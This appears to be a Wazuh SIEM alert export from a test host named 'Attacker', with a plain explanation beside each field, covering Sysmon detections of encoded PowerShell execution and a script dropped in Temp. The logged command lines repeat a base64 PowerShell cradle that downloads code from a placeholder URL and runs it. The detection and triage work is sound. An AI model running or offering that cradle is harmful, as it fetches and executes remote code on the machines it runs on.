data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zrwibxxr.3hb.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:04.632
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:58.880+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:58.880+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534218.1076109
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:06.3023920Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282529
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:05.384 ProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} ProcessId: 11096 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00} ParentProcessId: 11368 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:05.384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd5-680a-cc0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcd3-680a-c80a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11368
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:58.949+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:58.949+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  28
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534218.1084180
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:06.5107228Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282532
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:06.494 ProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} ProcessId: 11096 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4b14azk2.mml.ps1 CreationUtcTime: 2025-04-24 22:36:06.494 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:06.494
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd5-680a-cc0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4b14azk2.mml.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:06.494
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:59.081+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:59.081+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534219.1086949
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:07.3943395Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2403
Incremental log record number – handy for timeline order.

data.win.system.processID:  14228
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:07Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:07Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:59.633+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:59.633+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534219.1088531
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:08.7114133Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282582
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:07.440 ProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00} ProcessId: 652 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} ParentProcessId: 11096 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:07.440
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd7-680a-d00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  652
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcd5-680a-cc0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:59.652+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:59.652+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

